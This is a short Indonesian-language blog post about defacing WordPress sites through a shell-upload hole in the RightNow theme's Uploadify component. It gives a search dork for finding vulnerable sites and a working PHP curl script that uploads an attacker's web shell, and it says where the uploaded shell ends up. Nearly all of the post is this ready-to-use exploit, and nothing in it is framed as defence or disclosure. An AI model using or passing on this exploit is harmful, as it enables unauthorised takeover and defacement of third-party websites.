# Author : eX-Sh1Ne Dork
# Date : 04/04/2015
# Dork : inurl:"wp-content/themes/RightNow/" ( silahkan di experimen sendiri dork nya )
# Vuln : http://www.site.com/path/wp-content/them..._image.php
# Ganti up.php dengan nama shell agan yg udh di copas ke folder c:\xampp\php ( bagi pengguna Windus )
<?php
$uploadfile="up.php";
$ch = curl_init("http://127.0.0.1/wp-content/themes/RightNow//includes/uploadify/upload_background_image.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
# Shell Uploaded At www.site.com/wp-content/uploads/galleryimages/shell.php
0 Response to "Deface Menggunakan WordPress RightNow Theme Uploadify Shell Upload"
Post a Comment